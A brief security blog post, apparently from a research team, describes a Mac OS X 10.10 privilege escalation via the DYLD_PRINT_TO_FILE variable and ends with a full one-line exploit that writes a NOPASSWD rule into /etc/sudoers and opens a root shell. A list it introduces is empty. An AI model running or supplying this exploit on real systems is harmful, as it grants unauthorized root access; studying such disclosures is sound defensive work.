The Cyber Academy research team have been analysing a new Mac OS X vulnerability which allows for Privileged Access to the latest version of their operating system.
So many people think that the flaws that are appearing are legacy ones that have been around when computer security was not a major problem. The Unix kernel is now showing its age, especially in the methods that were used to created the basic functionality of the system, and in the sloppiness of the developers.
So there is a bit of shock that the latest one relates to an environment variable which was introduced in the latest version of the Mac OS (10.10): DYLD_PRINT_TO_FILE.
The problem is caused by Mac OS suffering from all the problems that Uni has, including:
The code basically allows for privileged root access to the system, and does this by using the DYLD_PRINT_TO_FILE environmental variable to write the following line into the /etc/sudoers:
ALL ALL=(ALL) NOPASSWD: ALL
which is a file which defines all super users on the system, and, in this case, gives superuser access to a user. A basic script is thus:echo python -c '"import os;os.write(3,\"ALL ALL=(ALL) NOPASSWD: ALL\")"'|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;sudo su